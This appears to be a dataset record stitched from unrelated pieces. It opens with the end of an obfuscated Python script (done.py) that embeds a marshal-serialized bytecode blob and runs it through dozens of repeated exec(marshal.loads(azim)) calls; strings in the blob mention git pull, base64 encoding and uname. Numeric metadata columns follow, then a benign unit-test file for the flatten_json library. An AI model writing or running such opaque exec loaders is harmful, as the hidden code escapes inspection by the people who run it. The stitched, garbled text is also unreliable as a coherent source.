\x12\x01\x0c\x01r\xae\x01\x00\x00\xda\x08__main__z\x08git 
pull)rrp\x00\x00\x00r\x15\x01\x00\x00r:\x00\x00\x00rM\x00\x00\x00r\xf3\x00\x00\x00r>\x00\x00\x00r\x17\x01\x00\x00rr\x00\x00\x00\xda\x04uuidr~\x00\x00\x00rK\x00\x00\x00\xda\x06base64r\x04\x00\x00\x00\xda\x12concurrent.futuresr\x05\x00\x00\x00rn\x01\x00\x00r\x06\x00\x00\x00r=\x01\x00\x00r\x08\x00\x00\x00r\x07\x00\x00\x00\xda\x0curllib.parser\t\x00\x00\x00\xda\x01Grl\x00\x00\x00r0\x00\x00\x00rQ\x00\x00\x00r\x93\x01\x00\x00r(\x00\x00\x00r\x97\x00\x00\x00rm\x00\x00\x00r*\x00\x00\x00r/\x00\x00\x00r\xa8\x01\x00\x00\xda\x02okr\xef\x00\x00\x00r\x92\x01\x00\x00\xda\x03now\xda\x07current\xda\x04year\xda\x02ta\xda\x05month\xda\x02bu\xda\x03day\xda\x02har\x8c\x01\x00\x00\xda\x05bulanr}\x00\x00\x00\xda\x06buTemp\xda\nValueError\xda\x02opr\x8d\x01\x00\x00r\xae\x00\x00\x00r\xa3\x00\x00\x00r\xaf\x00\x00\x00r\xb0\x00\x00\x00r\xb1\x00\x00\x00r\xb2\x00\x00\x00r\xb3\x00\x00\x00r\xb4\x00\x00\x00\xda\x05uname\xda\x05plist\xda\x05basex\xda\x06encode\xda\x06basex1\xda\tb64encode\xda\x06basex2\xda\x06decode\xda\x06basex3r\x96\x00\x00\x00\xda\x05base4r\xc4\x00\x00\x00\xda\tbasesplitrE\x00\x00\x00rG\x00\x00\x00rH\x00\x00\x00rO\x00\x00\x00rR\x00\x00\x00rn\x00\x00\x00rw\x00\x00\x00rx\x00\x00\x00ro\x00\x00\x00r\x9f\x00\x00\x00r\xa9\x00\x00\x00r\x98\x00\x00\x00r\x99\x00\x00\x00r\x9a\x00\x00\x00r\xda\x00\x00\x00r\xdb\x00\x00\x00r\xdc\x00\x00\x00r\xe0\x00\x00\x00r\xe2\x00\x00\x00r\xe3\x00\x00\x00r\xfa\x00\x00\x00r\x1e\x01\x00\x00r \x01\x00\x00rO\x01\x00\x00rT\x01\x00\x00rX\x01\x00\x00r^\x01\x00\x00r\xc7\x00\x00\x00r\x9b\x00\x00\x00r\x9c\x00\x00\x00r\x9d\x00\x00\x00r\xa9\x01\x00\x00r\x9e\x00\x00\x00rj\x00\x00\x00r\xa8\x00\x00\x00rl\x01\x00\x00rk\x01\x00\x00rm\x01\x00\x00r\xac\x01\x00\x00r\xae\x01\x00\x00r\x9b\x01\x00\x00rN\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rC\x00\x00\x00rD\x00\x00\x00\xda\x08<module>\x01\x00\x00\x00s\xc6\x00\x00\x00\x00\x04`\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x01\x0c\x03\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x04\x04\x01\x04\x01\x04\x01\x04\x03\x08\x01\x06\x01\x06\x01\x06\x01\x1e\x01\x08\x01\x02\x01\x10\x01\x06\x01\x0c\x01\x0c\x01\n\xff\x02\x02\x08\x01\x0e\x03\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x01\x04\x02\x0c\x01\x04\x01\n\x01\n\x01\n\x01\x08\x01\\\x03\x08\x06\x08\x07\x08\x07\x08\x07\x08\x16\x08/\x08\x12\x08Q\x08\n\x081\x08&\x08&\x08&\x08(\x08\x15\x08\x13\x08\x18\x08\x1b\x08\x07\x08\x08\x08\x1b\x08\x1e\x08\x1e\x08>\x08\n\x08\x16\x08\x1e\x0e\x7f\x00\x7f\x00\x7f\x00L\x08<\x08$\x08;\x08?\x08\x1b\x08\x08\x08\x08\x08\x06\x08\x07\x08\x08\x08\x17\x08\x06\n\x01\n\x01\x06\x01\n\xfdN)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x0
0\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x
00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\
x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00N)\x01\xda\x04azim\xa9\x00r\x04\x00\x00\x00r\x04\x00\x00\x00\xfa\x07done.py\xda\x08<module>\x01\x00\x00\x00\xf3\x00\x00\x00\x00'));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(
azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim));exec(marshal.loads(azim))
| 24,619.666667
| 147,699
| 0.75043
| 33,217
| 147,718
| 3.332541
| 0.058765
| 0.276701
| 0.217486
| 0.196536
| 0.777167
| 0.740282
| 0.701546
| 0.659629
| 0.632312
| 0.604605
| 0
| 0.374549
| 0.007873
| 147,718
| 5
| 147,700
| 29,543.6
| 0.380779
| 0
| 0
| 0
| 0
| 8.5
| 0.736303
| 0.566273
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
|
0
| 18
|
291393ac2557d8b14f073d84f9f9386f89073587
| 68,470
|
py
|
Python
|
test_flatten.py
|
kanelee7512/flatten
|
7f434c4d17061bf0e5fcba6ed27dc7604afcf1ee
|
[
"MIT"
] | null | null | null |
test_flatten.py
|
kanelee7512/flatten
|
7f434c4d17061bf0e5fcba6ed27dc7604afcf1ee
|
[
"MIT"
] | null | null | null |
test_flatten.py
|
kanelee7512/flatten
|
7f434c4d17061bf0e5fcba6ed27dc7604afcf1ee
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
import unittest
from flatten_json import (check_if_numbers_are_consecutive, cli, flatten,
flatten_preserve_lists, unflatten, unflatten_list)
try:
# python2
from StringIO import StringIO
except ImportError:
# python3
from io import StringIO
class UnitTests(unittest.TestCase):
def test_numbers_consecutive(self):
"""Checks if all numbers in a list are consecutive integers"""
list_ = [1, 2, 3, 4, 5]
actual = check_if_numbers_are_consecutive(list_)
self.assertTrue(actual)
list_ = [0, 1, 5]
actual = check_if_numbers_are_consecutive(list_)
self.assertFalse(actual)
list_ = [1.0, 2.0, 3.0]
actual = check_if_numbers_are_consecutive(list_)
self.assertTrue(actual)
list_ = range(10)
actual = check_if_numbers_are_consecutive(list_)
self.assertTrue(actual)
list_ = range(10, 0, -1)
actual = check_if_numbers_are_consecutive(list_)
self.assertFalse(actual)
def test_empty(self):
d = {}
expected = d
actual = flatten(d)
self.assertEqual(expected, actual)
def test_no_flatten(self):
dic = {'a': '1', 'b': '2', 'c': 3}
expected = dic
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_one_flatten(self):
dic = {'a': '1',
'b': '2',
'c': {'c1': '3', 'c2': '4'}
}
expected = {'a': '1', 'b': '2', 'c_c1': '3', 'c_c2': '4'}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_one_flatten_utf8(self):
dic = {'a': '1',
u'ñ': u'áéö',
'c': {u'c1': '3', 'c2': '4'}
}
expected = {'a': '1', u'ñ': u'áéö', 'c_c1': '3', 'c_c2': '4'}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_one_flatten_utf8_dif(self):
a = {u'eñe': 1}
info = dict(info=a)
expected = {u'info_{}'.format(u'eñe'): 1}
actual = flatten(info)
self.assertEqual(expected, actual)
def test_custom_separator(self):
dic = {'a': '1',
'b': '2',
'c': {'c1': '3', 'c2': '4'}
}
expected = {'a': '1', 'b': '2', 'c*c1': '3', 'c*c2': '4'}
actual = flatten(dic, '*')
self.assertEqual(expected, actual)
def test_list(self):
dic = {
'a': 1,
'b': [{'c': [2, 3]}]
}
expected = {'a': 1, 'b_0_c_0': 2, 'b_0_c_1': 3}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_list_and_dict(self):
dic = {
'a': 1,
'b': 2,
'c': [{'d': [2, 3, 4], 'e': [{'f': 1, 'g': 2}]}]
}
expected = {'a': 1, 'b': 2, 'c_0_d_0': 2, 'c_0_d_1': 3, 'c_0_d_2': 4,
'c_0_e_0_f': 1, 'c_0_e_0_g': 2}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_empty_list_and_dict(self):
dic = {
'a': {},
'b': [],
'c': '',
'd': None,
'e': [{'f': [], 'g': [{'h': {}, 'i': [], 'j': '', 'k': None}]}]
}
expected = {'a': {}, 'b': [], 'c': '', 'd': None,
'e_0_f': [], 'e_0_g_0_h': {}, 'e_0_g_0_i': [],
'e_0_g_0_j': '', 'e_0_g_0_k': None}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_tuple(self):
dic = {
'a': 1,
'b': ({'c': (2, 3)},)
}
expected = {'a': 1, 'b_0_c_0': 2, 'b_0_c_1': 3}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_empty_tuple(self):
dic = {
'a': 1,
'b': ({'c': ()},)
}
expected = {'a': 1, 'b_0_c': ()}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_blog_example(self):
dic = {
"a": 1,
"b": 2,
"c": [{"d": ['2', 3, 4], "e": [{"f": 1, "g": 2}]}]
}
expected = {'a': 1, 'b': 2, 'c_0_d_0': '2', 'c_0_d_1': 3,
'c_0_d_2': 4, 'c_0_e_0_f': 1,
'c_0_e_0_g': 2}
actual = flatten(dic)
self.assertEqual(expected, actual)
def test_unflatten_no_list(self):
dic = {
'a': 1,
'b_a': 2,
'b_b': 3,
'c_a_b': 5
}
expected = {
'a': 1,
'b': {'a': 2, 'b': 3},
'c': {'a': {'b': 5}}
}
actual = unflatten(dic)
self.assertEqual(expected, actual)
def test_unflatten_with_list(self):
"""Dictionary with lists"""
dic = {
'a': 1,
'b_0': 1,
'b_1': 2,
'c_a': 'a',
'c_b_0': 1,
'c_b_1': 2,
'c_b_2': 3
}
expected = {
'a': 1,
'b': [1, 2],
'c': {'a': 'a', 'b': [1, 2, 3]}
}
actual = unflatten_list(dic)
self.assertEqual(expected, actual)
dic = {'a': 1, 'b_0': 5}
expected = {'a': 1, 'b': [5]}
actual = unflatten_list(dic)
self.assertEqual(expected, actual)
dic = {'a': 1, 'b:0': 5}
expected = {'a': 1, 'b': [5]}
actual = unflatten_list(dic, ':')
self.assertEqual(expected, actual)
def test_unflatten_with_list_custom_separator(self):
"""Complex dictionary with lists"""
dic = {
'a:b': 'str0',
'c:0:d:0:e': 'str1',
'c:1:d:0:e': 'str4',
'c:1:f': 'str5',
'c:0:f': 'str2',
'c:1:g': 'str6',
'c:0:g': 'str3',
'h:d:0:e': 'str7',
'h:i:0:f': 'str8',
'h:i:0:g': 'str9'
}
expected = {
'a': {'b': 'str0'},
'c': [
{
'd': [{'e': 'str1'}],
'f': 'str2',
'g': 'str3'
}, {
'd': [{'e': 'str4'}],
'f': 'str5',
'g': 'str6'
}
],
'h': {
'd': [{'e': 'str7'}],
'i': [{'f': 'str8', 'g': 'str9'}]
}
}
actual = unflatten_list(dic, ':')
self.assertEqual(expected, actual)
def test_unflatten_with_list_nested(self):
dic = {"a": [[{"b": 1}], [{"d": 1}]]}
dic_flatten = flatten(dic)
actual = unflatten_list(dic_flatten)
self.assertEqual(actual, dic)
def test_unflatten_with_list_issue15(self):
"""https://github.com/amirziai/flatten/issues/15"""
dic = {"Required": {"a": "1",
"b": ["1", "2", "3"],
"c": {"d": {"e": [[{"s1": 1}, {"s2": 2}],
[{"s3": 1}, {"s4": 2}]]}},
"f": ["1", "2"]},
"Optional": {"x": "1", "y": ["1", "2", "3"]}}
dic_flatten = flatten(dic)
actual = unflatten_list(dic_flatten)
self.assertEqual(actual, dic)
def test_unflatten_with_list_issue31(self):
"""https://github.com/amirziai/flatten/issues/31"""
dic = {"testdict": {"seconddict": [["firstvalue",
"secondvalue"],
["thirdvalue",
"fourthvalue"]]}}
dic_flatten = flatten(dic)
actual = unflatten_list(dic_flatten)
self.assertEqual(actual, dic)
def test_unflatten_with_df_issue40(self):
"""https://github.com/amirziai/flatten/issues/40"""
dic = {
'a.b': float('nan'),
'a.b.c': 2,
'a.b.d': 3,
'a.e': 4
}
expected = {
'a': {'b': {'c': 2, 'd': 3},
'e': 4
}
}
actual = unflatten(dic, '.')
self.assertEqual(expected, actual)
def test_unflatten_with_key_loss_issue51(self):
"""https://github.com/amirziai/flatten/issues/51"""
dic = {
'a': 1,
'a_b': 2,
'a_c.d': 3,
'a_c.e': 4
}
expected = {
'a': 1,
'a_b': 2,
'a_c': {'d': 3, 'e': 4}
}
actual = unflatten(dic, '.')
self.assertEqual(expected, actual)
